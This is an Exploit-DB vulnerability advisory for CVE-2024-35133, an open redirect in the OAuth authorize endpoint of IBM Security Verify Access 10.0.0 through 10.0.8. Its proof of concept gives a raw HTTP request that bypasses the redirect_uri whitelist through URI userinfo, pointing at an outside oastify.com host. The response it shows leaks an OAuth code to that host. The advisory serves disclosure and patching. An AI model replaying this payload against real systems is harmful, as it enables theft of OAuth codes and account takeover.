IBM Security Verify Access 10.0.0 - Open Redirect during OAuth Flow

EDB-ID:

52123




Platform:

Multiple

Date:

2025-04-05


- IBM Security Verify Access >= 10.0.0 <= 10.0.8 - Open Redirect during OAuth Flow

======== < Table of Contents > ================================================

  0. Overview
  1. Detailed Description
  2. Proof Of Concept
  3. Solution
  4. Disclosure Timeline
  5. References
  6. Credits
  7. Legal Notices

======== < 0. Overview > ======================================================

  Revision:
    1.0

  Impact:
    By persuading a victim to visit a specially crafted Web site, a remote 
    attacker could exploit this vulnerability to spoof the URL displayed 
    to redirect a user to a malicious Web site that would appear to be
    trusted. This could allow the attacker to obtain highly sensitive 
    information or conduct further attacks against the victim.

  Severity:
    NIST: High
    IBM: Medium

  CVSS Score:
    NIST 8.2 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N)
    IBM 6.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:H/A:N)

  CVE-ID:
    CVE-2024-35133

  Vendor:
    IBM

  Affected Products:
    IBM Security Verify Access
    IBM Security Verify Access Docker

  Affected Versions:
    10.0.0 - 10.0.8

  Product Description:

    IBM Security Verify Access is a complete authorization and network
    security policy management solution. It provides end-to-end protection
    of resources over geographically dispersed intranets and extranets.

    In addition to state-of-the-art security policy management, IBM Security
    Verify Access provides authentication, authorization, data security, and
    centralized resource management capabilities.

    IBM Security Verify Access offers the following features:
    Authentication ~ Provides a wide range of built-in authenticators and
    supports external authenticators.

    Authorization ~ Provides permit and deny decisions for protected resources
    requests in the secure domain through the authorization API.

    Data security and centralized resource management ~ Manages secure access
    to private internal network-based resources by using the public Internet's
    broad connectivity and ease of use with a corporate firewall system.

======== < 1. Detailed Description > ==========================================

  During a Penetration Test of the OAuth flow for a client, it was found an
  Open Redirect vulnerability that can led to the leakage of the OAuth "code" variable.

  It was possible to bypass the parser's logic responsible for verifying the
  correctness and the validity of the "redirect_uri" parameter during an OAuth
  flow by leveraging RFC 3986 (3.2.1) providing a username and password directly 
  in the Uniform Resource Identifier (URI). 

  By providing as the "username" field a legitimate and expected domain, it 
  was possible to bypass the whitelist filter used by "IBM Security Verify Access"
  and cause an Open Redirect to any arbitrary domain controlled by the attacker, 
  not only altering the expected flow and redirect a user to a malicious 
  Web site that would appear to be trusted. 

  This could allow the attacker to obtain highly sensitive like the OAuth "code" 
  token or conduct further attacks against the victim

======== < 2. Proof of Concepts > =============================================

===== REQUEST =====

[[
  GET /oauth/oauth20/authorize?response_type=code&client_id=[REDACTED]&state=001710863806728MPUw0xFSj&REDACTED_uri=https://legitimate.domain:bypass@0lmd9sa7p0cez16vdcldhcgygpmga6yv.oastify.com/[REDACTED]/openid/REDACTED/[REDACTED]&scope=openid+ HTTP/1.1
  Host: [REDACTED]
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate, br
  Upgrade-Insecure-Requests: 1
  Sec-Fetch-Dest: document
  Sec-Fetch-Mode: navigate
  Sec-Fetch-Site: same-origin
  Sec-Fetch-User: ?1
  Te: trailers
  Connection: close
]]

===== RESPONSE =====

[[
  HTTP/1.1 302 Found 
  content-language: en-US 
  date: Tue, 19 Mar 2024 16:04:35 GMT 
  location: https://legitimate.domain:bypass@0lmd9sa7p0cez16vdcldhcgygpmga6yv.oastify.com/[REDACTED]/openid/REDACTED/[REDACTED]?state=001710863806728MPUw0xFSj&code=7wkH581y0uyS0nm4ff65zCqHn0WC46w7v&iss=[REDACTED] 
  p3p: CP="NON CUR OTPi OUR NOR UNI" 
  x-frame-options: DENY 
  x-content-type-options: nosniff 
  cache-control: no-store 
  x-xss-protection: 1; mode=block 
  x-permitted-cross-domain-policies: none 
  cross-origin-resource-policy: same-site 
  content-security-policy: frame-ancestors 'none' 
  referrer-policy: no-referrer-when-downgrade 
  strict-transport-security: max-age=31536000; includeSubDomains 
  pragma: no-cache 
  Content-Length: 0.
]]

======== < 3. Solution > ======================================================

  Refer to IBM Security Bulletin 7166712 for patch, upgrade or
  suggested workaround information.

  See "References" for more details.

======== < 4. Disclosure Timeline > ===========================================

  19/03/2024 - Vulnerability discovered by the Security Researcher (Giulio Garzia)
  21/03/2024 - Vulnerability shared with the client who committed the 
		Penetration Test on his infrastructure, relying on IBM SVA
  02/04/2024 - Vulnerability shared with IBM
  02/04/2024 - Vulnerability taken over by IBM
  14/05/2024 - Vulnerability confirmed by IBM
  18/07/2024 - Pre-release provided by IBM to the customer to verify the
		resolution of the vulnerability
  27/08/2024 - Security Bulletin and vulnerability shared by IBM

======== < 5. References > ====================================================

  (1) https://www.ibm.com/support/pages/security-bulletin-security-vulnerability-was-fixed-ibm-security-verify-access-cve-2024-35133
  (2) https://exchange.xforce.ibmcloud.com/vulnerabilities/291026
  (3) https://nvd.nist.gov/vuln/detail/CVE-2024-35133
  (4) https://cwe.mitre.org/data/definitions/178.html
 
======== < 6. Credits > =======================================================

  This vulnerability was discovered and reported by:

    Giulio Garzia 'Ozozuz'

  Contacts:

    https://www.linkedin.com/in/giuliogarzia/
    https://github.com/Ozozuz

======== < 7. Legal Notices > ================================================

  Copyright (c) 2024 Giulio Garzia "Ozozuz"

  Permission is granted for the redistribution of this alert
  electronically. It may not be edited in any way without mine express
  written consent. If you wish to reprint the whole or any
  part of this alert in any other medium other than electronically,
  please email me for permission.

  Disclaimer: The information in the advisory is believed to be accurate
  at the time of publishing based on currently available information.
  Use of the information constitutes acceptance for use in an AS IS
  condition.
  There are no warranties with regard to this information. Neither the
  author nor the publisher accepts any liability for any direct,
  indirect, or consequential loss or damage arising from use of,
  or reliance on,this information.